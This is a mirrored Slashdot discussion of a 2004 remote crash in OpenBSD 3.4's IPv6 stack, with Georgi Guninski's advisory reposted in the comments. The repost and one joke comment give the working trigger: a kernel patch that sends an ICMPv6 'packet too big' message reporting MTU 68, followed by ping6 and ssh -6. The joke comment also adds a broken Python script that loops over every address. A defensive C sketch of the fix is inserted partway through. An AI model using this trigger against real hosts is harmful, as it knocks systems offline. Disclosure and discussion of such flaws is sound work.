Slashdot Mirror


Remotely Crash OpenBSD

*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.


  1. Oh well... by Seoulstriker · · Score: 5, Funny

    I think it's time to upgrade to windows.

    --
    I am defenseless. Use your button. Mod me down with all of your hatred.
    1. Re:Oh well... by phoenix_rizzen · · Score: 5, Informative

      Nope. Microsoft bought the STREAMS implementation of TCP/IP from Spyder, Inc.

      The only TCP/IP-related bits MS took from BSD were a few utilities like ftp.exe and telnet.exe. The actual TCP/IP stack is not related to BSD in any way.

    2. Re:Oh well... by NanoGator · · Score: 4, Funny

      "Upgrade what,... maybe... your stress level???"

      Vice City relieves that.

      --
      "Derp de derp."
    3. Re:Oh well... by kl76 · · Score: 4, Interesting

      Who the heck is Spyder Inc? The TCP/IP stack in NT 3.1 was the STREAMS-based SpiderTCP 6 (IIRC) from Spider Systems Ltd. (I used to work for them). This in turn used some BSD code. This stack was replaced in NT 3.5, with a stack allegedly written from scratch at Microsoft according to this.

    4. Re:Oh well... by HalliS · · Score: 5, Funny
      • I think it's time to upgrade to windows.


      Wrong. The openbsd people obviously included this "crash feature" just so that windows people could feel at home with OpenBSD. I think it's time for Windows folks to switch to OpenBSD.
      --


      My other UID is 1337
  2. Does this count? by DNAspark99 · · Score: 5, Interesting

    Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?

    --
    Society has traditionally always tried to find scapegoats for its problems. Well, here I am.
    1. Re:Does this count? by inertia187 · · Score: 5, Insightful

      I don't think the IPv6 install is the default. Even if it is, 'it's just a crash' not a remote hole. So, yes they can still boast.

      --
      A programmer is a machine for converting coffee into code.
    2. Re:Does this count? by Richard_at_work · · Score: 5, Interesting

      IPv6 is available in the base install, but you have to actually have an IPv6 address assigned that people can get to to exploit this issue. It's really a non issue for the 99% of people running OpenBSD out there, but for some, like myself, it's time to upgrade.

    3. Re:Does this count? by timeOday · · Score: 3, Insightful
      Guess it depends on how you define "hole."

      Personally I don't like random people crashing my servers, so I'd call it a hole!

    4. Re:Does this count? by Nimrangul · · Score: 3, Informative
      I recall this vaguely, that was only able to crash sshd on a recent OpenBSD box, it was exploitable on other platforms (though older OpenBSDs would have been equally vulnerable).

      Not only that, but for those blaming OpenSSH for making bad code that created the exploit, it was one that had been present since ossh (the free ssh implementation the OpenBSD team used to make OpenSSH).

      --
      I'm sick of following my dreams - I'm just going to ask them where they're going and hook up with them later.
    5. Re:Does this count? by kkenn · · Score: 5, Informative

      There have actually been a number of local and remote root holes in the default install of OpenBSD during that time frame..the only sense in which their claim is true is that they don't count root holes except in the head of the CVS tree. If a release from a year ago had the hole, but the current tree does not, they don't count it.

      For example, a couple of years ago there was a telnetd exploit discovered after OpenBSD had disabled telnetd by default in OpenBSD-current, but a recent prior release had shipped with telnetd enabled. That allowed them to rationalize not counting it as a remote hole. There are a number of other similar examples.

    6. Re:Does this count? by edhall · · Score: 2, Insightful

      Just because they fixed it before it was reported doesn't mean it never existed -- or that it was never quietly exploited. This sort of semantic game detracts from the hard work that goes into OpenBSD. It may be no worse than the sort of word games used to market other software, but in an area like security where trust is paramount it needlessly raises suspicion.

      -Ed
    7. Re:Does this count? by Anonymous Coward · · Score: 2, Insightful

      It does to me because that's how it's always been done with OBSD. Look, when someone says something, you have the opinion and right to look at the veracity or underlying premise of -what- is being said. It's been pretty clear for a couple of years what OBSD's standard for that statement is.

      iow, if it doesn't make sense to you, that's completely fine. But it's not like OBSD is being hush hush, nudge wink with how they come up with their count.

      imnsho, at least they have a standard or policy or rules or what have you for determining their remote hole count. Of all other OS makers, groups, and mfgs out there, I don't know of one other that keeps count, has a public statement of that count, gives publicly accessible rules for determining that count, and follows those rules. Linux sure doesn't--the sheer variation, number of distros, etc. has no one keeping a firm count. OBSD is more limited and applies it to their default install.

      Personally, I like OBSD's claim and think it's valid, both in the areas of valid to make and valid as valuable to the OS user.

      Compare them to other OS makers. When MS releases a security patch and months later, Melissa or some other virus comes along and exploits it because people were too lazy to plug up their systems, I don't say "That's MS's fault." I consider that on incompetent or lazy users. Now, I realize many here on this forum will blame MS, and they do get boatloads of blame, but they also patched the damn thing. Sometimes with these patches, the patch itself reveals the error and makes it widely known; virus or exploit writers then go about taking advantage of that, comparing differences between a patched and unpatched systems.

      When Samba had that "caught in the wild" security issue last year, I don't say "well that's been in the wild 5 years" and then count that one bug multiple times against them for every Samba version released since then, or every update. Why not? Because that would be ludicrous. Likewise with OBSD, I don't say "well, that was out there since release X when Y code was added, hence that counts for every release since X until current as a bug".

      Note with the last, this also reveals that people and communities innately have their own idea or standards on how "bugs" are counted against to versions or releases. Most people would say Samba's bug they caught in the wild counts as 1 bug. And they'd be right. Not several via every Samba release since that code was written.

      Same with OBSD. They have a standard, they found an issue, so does it apply to their policy for determining that count? No. Count doesn't go up.

  3. Double standards? by Threni · · Score: 5, Insightful

    I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

    1. Re:Double standards? by Anonymous Coward · · Score: 5, Funny

      if someone from Microsoft stated "It's just a crash"

      Yeah, but on Windows, how can you tell the difference?

      (Admit it, you asked for it)

    2. Re:Double standards? by jwthompson2 · · Score: 2, Insightful

      "It's Just a crash" is among the dumbest things anyone could say about a bug. Not quite as bad as "It's just a remote root exploit" but very disturbing none the less. The only thing that seems to offer any reassurance is that it requires a patched kernel or custom stack to exploit but a person bent on bringing down a system *could* do these things without too much trouble I would think. My question is for a serious cracker wouldn't taking down a system in a manner like this be much more inviting if all they want to do is bring a system down?

      --
      Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
    3. Re:Double standards? by gid13 · · Score: 2, Insightful

      If Microsoft had few enough exploits that they had a security record worth protecting by saying "it's just a crash", perhaps the editors wouldn't feel it necessary to be so sarcastic?

      Especially given that Microsoft is a company that charges for their product, where OpenBSD is free.

    4. Re:Double standards? by spitzak · · Score: 4, Insightful

      He IS being sarcastic. If this was a Microsoft bug and they said "It's just a crash" it surely would be quoted exactly the same way, because it is a silly statement. Let's see:

      *no comment* writes "If you are IPv6 on WinXP, it might be time to upgrade to Linux (just kidding). There is, however, a way to crash WinXP with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Bill Gates, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.

      Okay, now that the wording has been changed to Microsoft, doesn't it suddenly look like a typical rabid-anti-Microsoft Slashdot article? You are so blinded by the belief that everything is anti-Microsoft that you cannot even see people being sarcastic about anything not Microsoft!

  4. Re:Remotely? by Beolach · · Score: 4, Informative

    No, in order to perform an attack on an OpenBSD box with this vulnerability you need to patch a Linux Kernel or roll your own network stack.

    --
    Join moola.com, play games to earn money.
  5. Patch for production systems? by agentZ · · Score: 5, Interesting

    I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current. There's no patch or even a mention of this problem on the errata page.

    What's a sane admin to do?

    1. Re:Patch for production systems? by Richard_at_work · · Score: 4, Informative

      Give it a little time. They usually patch -current first to test it out, then backport the patches to -stable. Patching -current first saves time in the long run, in cases like this where it's not really a MS level issue :) If it was more serious, -stable would get the patch first, and then it would be ported into -current.

    2. Re:Patch for production systems? by Anonymous Coward · · Score: 3, Informative

      It's been patched in -current for 3 days now.

    3. Re:Patch for production systems? by Ryvar · · Score: 4, Interesting

      Do what I did last night before I even knew about this - comment IPV6 completely out of your kernel entirely for efficiency's sake.

      One of the reasons OpenBSD tends to be more secure is because it ships with *almost* everything off. However, there's a solid 10+ default user accounts, 3-4 default services (sshd, sendmail, inetd/portmap), and 75+ kernel/device options you should remove/recompile out upon installation (this is all assuming your only purpose is to create an x86-based router).

      Yes, you'll need to muck about with /etc/mtree/special and /var/cron/tabs a bit to keep everything from whining to syslog constantly, but every unnecessary thing removed is a potential exploit avoided.

      --Ryv

    4. Re:Patch for production systems? by Ryvar · · Score: 3, Interesting

      Smart.

      If I setup the system for mail - which I don't do for a simple firewall - I also use Postfix. Only other alternative is qmail and DJB's stuff is just too much of a PITA/non-standard.

      --Ryv

  6. Re:Remotely? by athakur999 · · Score: 4, Informative

    No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.

    --
    "People that quote themselves in their signatures bother me" - athakur999
  7. Re:patching a Linux kernel? by Roofus · · Score: 4, Informative

    They are saying that to exploit would require a patch to the Linux kernel.

    I like your way better though!

  8. RTFA by Anonymous Coward · · Score: 5, Informative

    You have to have a modified ipv6 stack in order to exploit this bug, not to fix it. I can remotely crash your ipv6 enabled openbsd if I modify my linux kernel. Capisce?

  9. Slashdotted by Anonymous Coward · · Score: 5, Informative

    Remote openbsd crash with ip6, yet still openbsd much better than windows

    Systems affected:
    tested on openbsd 3.4
    not clear about netbsd
    freebsd not vulnerable

    Risk: Medium
    Date: 4 February 2004

    Legal Notice:
    This Advisory is Copyright (c) 2004 Georgi Guninski.
    You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts
    of it without the author's written permission - this especially applies to
    so called "vulnerabilities databases" and securityfocus, microsoft, cert
    and mitre.
    If you want to link to this content use the URL:
    http://www.guninski.com/obsdmtu.html
    Anything in this document may change without notice.

    Disclaimer:
    The information in this advisory is believed to be true though
    it may be false.
    The opinions expressed in this advisory and program are my own and
    not of any company. The usual standard disclaimer applies,
    especially the fact that Georgi Guninski is not liable for any damages
    caused by direct or indirect use of the information or functionality
    provided by this advisory or program. Georgi Guninski bears no
    responsibility for content or misuse of this advisory or program or
    any derivatives thereof.

    Description:
    It is possible to remotely crash openbsd 3.4 if the host receives icmpv6
    and there is a listening tcp port.
    quoting de raadt: "it is just a crash."
    remote crash which screws the kernel.
    unknown whether this may be exploited for code execution.

    Details:
    The problem is triggered by setting small ipv6 mtu and then doing tcp
    connect.
    How to reproduce:
    Patch linux kernel 2.4.24 net/ipv6/icmp.c :

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    then:
    ping6 openbsd
    ssh -6 openbsd

    Workaround:
    It is believed that openbsd current is not vulnerable.
    netbsd current also seems to have related changes.
    check:
    http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet6/ip6_output.c
    http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet/tcp_output.c?sortby=date

    Vendor status:
    open, net and free bsd were notified Sun, 1 Feb 2004 16:35:56 +0200

    Georgi Guninski
    http://www.guninski.com

    1. Re:Slashdotted by cgenman · · Score: 2, Funny

      His server is running on OpenBSD. It is only a matter of time before some smart a$$ crashes it.

  10. Crash or Slash? by Halthar · · Score: 5, Funny

    Great, now when I try and check the linked article and can't get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.

    Hell, who knows, maybe this one is Google's fault too.

  11. So this is why... by Tomy · · Score: 4, Funny

    ...my BSD is dying...

  12. Re:Oh wow by lxs · · Score: 4, Insightful

    I'd rather have a box crashed than a box rooted. But maybe I'm just funny that way.

  13. What are the chances.... by Anonymous Coward · · Score: 2, Funny

    Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and IPv6 network in the same place? I think I'd better stick to plausible worries like lightning strikes, seatbelt failures, and choking to death on my turkey dinners.

  14. Re:Remotely? by 0racle · · Score: 3, Informative

    You appear to be missing the whole problem.

    This is a problem with OpenBSD's IPv6 implementation where if you send bad data, it looks like sending something larger than expected, then the kernel will crap out on you.

    The rolling your own kernel OR build your own network stack is what's required for the REMOTE host to send these bad packets to your system and crash it.

    On an unrelated note, it's a little disturbing to see this as I just rebooted an OBSD 3.3 system to upgrade to 3.4, but then again, I don't run IPv6.

    What I would say is most suspect is Theo's reaction "It's just a crash." You would hope someone who started a project to create the world's most secure OS would actually care there might be a problem.

    --
    "I use a Mac because I'm just better than you are."
  15. It's only a crash....fun with python by Anonymous Coward · · Score: 3, Funny

    Hey but is only a crash nothing at all to worry about...

    Patch linux kernel 2.4.24 net/ipv6/icmp.c :

    case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
    icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

    then:
    ping6 openbsd
    ssh -6 openbsd

    #!/usr/bin/python
    import popen2,string

    def cmd_execute(cmd):
    p = popen2.Popen3(cmd)
    p.wait()
    return string.strip(p.fromchild.read())

    #kill everybody
    for a in range(0,255):
    for b in range(0,255):
    for c in range(0,255):
    for d in range(0,255):
    execute('ping6 ' + a + '.' + b + '.' + c + '.' + d)
    execute('ssh -6 ' + a + '.' + b + '.' + c + '.' + d)

    1. Re:It's only a crash....fun with python by pHDNgell · · Score: 2, Informative

      How is this funny? Pinging IPv4 address with IPv6? If you're going to make a joke, at least get it right.

      --
      -- The world is watching America, and America is watching TV.
  16. about ipv6 by MrLint · · Score: 4, Interesting

    Not long ago there was an article about not only how ipv6 isn't needed, but that since it's 'new' code, it has a lot of problems that have long since been worked out of ipv4. Is this an example of that? Should we worry?

    I have to ask myself that with all of the decades of experience that has gone into ipv4 development and hacking and exploiting, are these fears justified? Have all the glitches in ipv4 been found? And if so isn't it trivial to avoid the same early mistakes in ipv6? Does this particular problem have an ipv4 analog? Is it even a stack theory issue? Is it just an implementation oversight?

    Does anyone have any insight?

    1. Re:about ipv6 by burns210 · · Score: 2, Insightful

      ipv6 is a must-upgrade solution... it IS newer code, it does get rid of NAT (which is partially used for security) and ipv4 DOES have some hacks to make it scale higher... however, once all of china connects to the net, all of india, all of everyone, there just physically isn't enough. And NAT just isn't a clean solution when used with private addressing, it works, but it is a hack to an unavoidable fix.

      ipv6 has security built into it, more addresses than particles in the universe, and eliminates the need for private addressing and nat... we should move to ipv6 if for no other reason than it is a cleaner, better solution to internet addressing.

    2. Re:about ipv6 by Tim+the+Gecko · · Score: 3, Informative
      No major backbones carry IPv4 tunneled over IPv6. You might be thinking of MPLS which is present in a lot of backbone networks.

      It's hard to believe there is 'heavy' use of IPv6 when the dedicated IPv6 exchange in the UK peaks at 4Mbit/s of traffic and the LINX exchange in London has >30Gbit/s of IPv4 traffic

      https://lg.ipv6.btexact.com/lgmrtg/hopper-day.html

      http://www.linx.net/tools/stats/index.thtml

  17. Re:do FreeBSD & OpenBSD use the same kernel? by cant_get_a_good_nick · · Score: 3, Informative

    No. They use very different kernels, though a lot of code is shared among them.

  18. It's called selective quoting by Flower · · Score: 5, Insightful
    Without seeing Theo's complete statement you can't tell if the statement is dismissive (something I find difficult to believe) or if it is qualifying - i.e. the exploit only produces a crash.

    Fwiw, I wouldn't go into riot mode over four monosyllable words taken out of context be it from MS or OBSD. Of course, this is /. and that nice little blurb will most certainly cause a lot of banner hits as people will just have to comment. I can personally attest to 3 to get this post up.

    --
    I don't want knowledge. I want certainty. - Law, David Bowie
  19. Re:Maybe not... by Zebedeu · · Score: 2, Funny
    Note: I am not an OpenBSD apologist... I am a Mac apologist.

    Steve?
    Now now, don't be so hard on yourself, we don't really think it's necessary to apologise :)

  20. "Crash" vs. "Root Exploit" by billstewart · · Score: 4, Insightful
    Yes, it's disturbing, but only because it happened, not because Theo's clueless. But the point of such a comment is that "It's NOT a root exploit". By contrast, with Microsoft, major exploits happen Too Frequently and crashes happen too often to bother reporting.

    A non-serious cracker might have fun taking down OpenBSD a few times with an exploit like this. A more serious cracker would do this to try to convince some number of systems to stop running the most secure OS that's reasonably available and replace it with more vulnerable systems that aren't getting spanked a lot.

    --

    Bill Stewart
    New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
  21. Re:Maybe time to drop this "securitier than thou" by ScottSpeaks! · · Score: 5, Insightful

    I'd find the OpenBSD crew's haughty "more secure than thou" attitude a lot more annoying if it weren't for the fact that their track record actually justifies it. The fact that you can still count the number of remote exploits using a two-bit register is pretty impressive.

  22. Re:Maybe time to drop this "securitier than thou" by Richard_at_work · · Score: 4, Insightful

    Yes, when I saw this and noticed people commenting on the "Securer than thou" stance taken, my immediate thought was

    "Hmm, well if we have gotten to the point where people have to roll their own net stack or patch a kernel to bring an issue to the fore, then hasn't the OpenBSD project succeeded in its goal?"

  23. Seems like "Just an incorrect size handling" by loconet · · Score: 2, Informative

    I'm glad they fixed it..

    http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet6/ip6_output.c.diff?r1=1.81&r2=1.82&f=h
    http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet/tcp_output.c.diff?r1=1.106&r2=1.107&sortby=date&f=h

    --
    [alk]
  24. Re:OpenBSD crashes: how could it have been prevent by Penguinshit · · Score: 4, Funny


    The good thing about ports is that, due to their alcohol and tannin content, you *CAN* leave them open much longer than more typical wines. I have a nice port (Fonseca) sitting open on my bar at home. I take a couple of nips from it every evening, and then replace the glass stopper on the carafe. It is a wonderful way to end the work-day. Go grab yourself a 10-year Tawny and you'll see what I mean.

    You do need to be careful with how many ports you have open. I find after a couple of ports my work product increases. After a few more, it tends to decrease, exponentially going downhill with each subsequent port. You need to be especially careful with a root prompt and several open ports late at night.

    For extra kicks, blind taste a Tawny against a Madeira.

    Enjoy.

  25. Re:Oh wow by mr_death · · Score: 3, Funny

    My ip address is 127.0.0.1. Knock yourself out.

    --
    It's Linux, damnit! Pay no attention to renaming attempts by self-aggrandizing blowhards.
  26. already fixed!!! by BigBadDude · · Score: 5, Informative

    now, how many times does this happen to your favorite OS vendor and their favorite web browser???

    from the openbsd CVS:
    Revision 1.82 / (download) - annotate - [selected], Wed Feb 4 08:47:41 2004 UTC (38 hours, 50 minutes ago) by itojun
    Branch: MAIN
    CVS Tags: HEAD
    Changes since 1.81: +100 -18 lines
    Diff to previous 1.81 (colored)
    strictly follow RFC2460 section 5, last paragraph (sender behavior when path MTU 1280). bug found by Georgi Guninski. ok dhartmei
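
The advisory quoted above triggers the crash with a Packet Too Big message reporting MTU 68, and this commit message describes the fix as following RFC 2460 section 5, last paragraph. The C sketch below is an added example of that receiver-side rule and of why an unclamped MTU is dangerous in size arithmetic; it is not OpenBSD's code, and `pmtu_state`, `ptb_parse`, `pmtu_apply`, `tcp_payload_room` and the sample message are hypothetical names and constructed data.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define IPV6_MIN_MTU         1280u /* RFC 2460 section 5: minimum IPv6 MTU */
#define ICMP6_PACKET_TOO_BIG 2u    /* ICMPv6 type of Packet Too Big */
#define IPV6_HDR_LEN         40u
#define TCP_HDR_LEN          20u

/* Hypothetical per-destination state (not an OpenBSD structure). */
struct pmtu_state {
    uint32_t mtu;          /* current path MTU estimate */
    int      add_frag_hdr; /* 1: put a Fragment header on every packet */
};

/* Constructed sample: ICMPv6 Packet Too Big reporting MTU 68, the value
 * used in the advisory. Layout: type, code, checksum(2), MTU(4, big-endian).
 * The checksum is left zero because this example does not verify it. */
static const uint8_t SAMPLE_PTB[8] = { 2, 0, 0x00, 0x00, 0, 0, 0, 68 };

/* Read the MTU field of a Packet Too Big message.
 * Returns 0 on success, -1 for a short buffer or another ICMPv6 type. */
int ptb_parse(const uint8_t *msg, size_t len, uint32_t *mtu_out)
{
    if (msg == NULL || mtu_out == NULL || len < 8)
        return -1;
    if (msg[0] != ICMP6_PACKET_TOO_BIG)
        return -1;
    *mtu_out = ((uint32_t)msg[4] << 24) | ((uint32_t)msg[5] << 16) |
               ((uint32_t)msg[6] << 8) | (uint32_t)msg[7];
    return 0;
}

/* Sender behaviour from RFC 2460 section 5, last paragraph: a reported MTU
 * below 1280 does not shrink the estimate below 1280; the sender adds a
 * Fragment header instead. Reports larger than the estimate are ignored. */
struct pmtu_state pmtu_apply(struct pmtu_state st, uint32_t reported)
{
    if (reported < IPV6_MIN_MTU) {
        st.add_frag_hdr = 1;
        reported = IPV6_MIN_MTU;
    }
    if (reported < st.mtu)
        st.mtu = reported;
    return st;
}

/* TCP payload room for a path MTU; extra_hdr covers extension headers and
 * TCP options. Returns 0 rather than wrapping when the headers do not fit. */
uint32_t tcp_payload_room(uint32_t mtu, uint32_t extra_hdr)
{
    uint32_t overhead = IPV6_HDR_LEN + TCP_HDR_LEN + extra_hdr;
    return mtu > overhead ? mtu - overhead : 0;
}

/* The same subtraction with no guard, kept only to show the wrap-around. */
uint32_t tcp_payload_room_unchecked(uint32_t mtu, uint32_t extra_hdr)
{
    return mtu - (IPV6_HDR_LEN + TCP_HDR_LEN + extra_hdr);
}

int main(void)
{
    struct pmtu_state st = { 1500, 0 };
    uint32_t reported = 0;

    if (ptb_parse(SAMPLE_PTB, sizeof SAMPLE_PTB, &reported) != 0)
        return 1;
    /* 12 bytes of TCP options is an assumed figure for illustration. */
    printf("reported MTU %u, unchecked room %u\n", (unsigned)reported,
           (unsigned)tcp_payload_room_unchecked(reported, 12));
    st = pmtu_apply(st, reported);
    printf("clamped MTU %u, frag header %d, room %u\n", (unsigned)st.mtu,
           st.add_frag_hdr, (unsigned)tcp_payload_room(st.mtu, 12));
    return 0;
}
```
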

  27. Track record by AvantLegion · · Score: 5, Insightful
    I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...

    The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.

    OpenBSD had earned a little slack. MS still has a long way to go in system security/stability before they deserve the same treatment.

  28. and the linux zealots cried out by ShadowRage · · Score: 3, Funny

    "our linux crashed your openbsd!"

  29. Re:Cowboyneil needs to check his head by Crimson+Midget · · Score: 3, Informative

    First of all it's CowboyNeal.
    Secondly, there's nothing wrong with his statement. In order to exploit the bug, you need to be running a patched Linux kernel to send the necessary packet.

  30. Re:Oh wow by gpinzone · · Score: 4, Funny

    Wow! You've got a ton of porn on there!

  31. Re:Oh wow by Nimrangul · · Score: 5, Insightful

    What crackpipe have you been using? It must greatly enhance the smoking experience. The funding was not pulled "pulled moments before it was to be paid," the funds were already greatly used. There was about three months left before the funding from POSSE was ended. Theo does not seem like an ass to me, he does instead seem like someone that dismisses stupid shit that random people say because he has better things to do.

    --
    I'm sick of following my dreams - I'm just going to ask them where they're going and hook up with them later.
  32. Re:Just a crash? Crash == DoS, no? by wirelessbuzzers · · Score: 2, Interesting

    I thought Theo's comment sounded really arrogant, too. But you might note that the author quoted it with no context, so who knows whether it was in real life.

    Now as for Microsoft, if MS patched something within... no, wait, it was patched before the bug came out... anyway, we'd cut them a bit more slack.

    --
    I hereby place the above post in the public domain.
  33. What Theo really said.... by One+Louder · · Score: 4, Funny



    To quote Theo, 'it is just a wardrobe malfunction.'"

  34. Why does "remote hole" == elevation of privilege? by xswl0931 · · Score: 5, Insightful

    A "remote hole" doesn't have to just be obtaining root access. Being able to remotely crash a server is almost as bad. So no, they cannot boast.

  35. Mod Parent Humor-Impaired Down Please by Tomy · · Score: 3, Funny


    Troll?!? It was humor, you insensitive clod.

  36. Re:Maybe time to drop this "securitier than thou" by DeltaSigma · · Score: 2, Interesting

    What I've been wondering is if anyone has read any of the literature regarding OpenBSD's methodology. I recall it being expressly mentioned that they would rather have the machine crash than have it rooted. Which is a good idea if you cannot risk a break-in. They try to break-in, you crash, and now you're in a more secure state (off) than you were when they attacked you.

  37. Just a crash.. by fven · · Score: 4, Insightful

    As a sysadmin of a college network, "just a crash" *really* helped me.

    I replaced all firewalls with OpenBSD filtering bridges. One rather persistent script kiddie (unfortunately a legitimate $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.

    Immediately no packets enter or leave that subnet and I get about 40 phone calls "the internet is broken / my session crashed..." and go and deal with it.

    Just a crash, saved several boxes. By contrast, accessible linux machines, privilege escalation - root exploit. All over.

    Now if only the average windows box would *only* bluescreen in response to being cracked/ infection with the latest...rather than sending mal packets everywhere. Then infection would be self limiting and the world would be a better place.

  38. And spyder inc. got their stack from by konmaskisin · · Score: 4, Funny

    a complete clean room implementation using engineers that didn't read BSD TCP/IP code in school ...

    yeah right ...

  39. Re:IPv7? by weicco · · Score: 2, Insightful

    Maybe because 6 bytes can't fit in address field which length is 4 bytes, you would trash the option-field or data :P

    --
    You don't know what you don't know.
  40. Re:You are a moron. by hdw · · Score: 2, Informative

    I beg to differ.

    Removing unused features/services/functions does add to your overall security and system stability.

    If you don't use IPv6 then taking it out of your kernel is a good move.

    But I agree to a point, just rampaging thru your kernel config removing fluff isn't security.
    Done in a sane way it's an addition to security and stability.
    // hdw

    --
    Executive Pope (small) Kallisti Engineering
  41. Re:Maybe time to drop this "securitier than thou" by tiger99 · · Score: 2, Insightful
    The analogy would be the way the press treat road and rail accidents. In the UK (BTW no passengers at all were killed in crashes last year) it is headline news for weeks, and then again all through the inevitable public enquiry if 4 people are killed in a train crash, yet IIRC on the same day, or maybe the next day as 4 were killed in the crash I am thinking of, at least 10 died on the roads, 6 in one vehicle. That one got a small paragraph.... The average is 10 a day in the UK on the roads, about 2 or 3 per year in trains.

    Now the specialist press, including web sites, who know of the existence of OpenBSD, are likely to treat this in much the same way. A BSD crash, any variant, is a rarity, 1000 times or more less likely to happen than a BSOD. Same sort of ratio for security holes also. So, the same thing happens, the uncommon major event gets the attention, although it does far, far less harm overall than the very common everyday event.

    Of course in this case the normal press remain in utter ignorance, some of them may know that Windoze is not the same as a MAC, a few will know of Linux, and very few indeed will know what BSD is, they probably think it is a shorter abbreviation for BSOD. So, the mainstream press will leave this well alone.

    It is quite right and proper that crashes should be reported, and certainly it is only fair that a problem with a secure OS gets to be known, and fixed, but like the train crash, it needs to be kept in perspective.

    I know that Theo allegedly has an attitude problem, however those who extrapolate from his remark that it is only a crash to suggest that he does not care are IMHO quite wrong. I think he was only putting the event in its true perspective, as being of slightly less importance than a security breach. I think he does care, very much, that "his" software works properly, that is what drives such people, who could earn much more financial reward elsewhere.

    All of this is a matter of seeing the thing in its true perspective. If people did that, no-one at all would use the products of the Convicted Monopolist, and the world would be a very much safer place as regards computer security, and much more productive because there would probably be only one crash for 1000 or even 1000000 BSODs in inferior systems, which are riddled with fundamental design errors.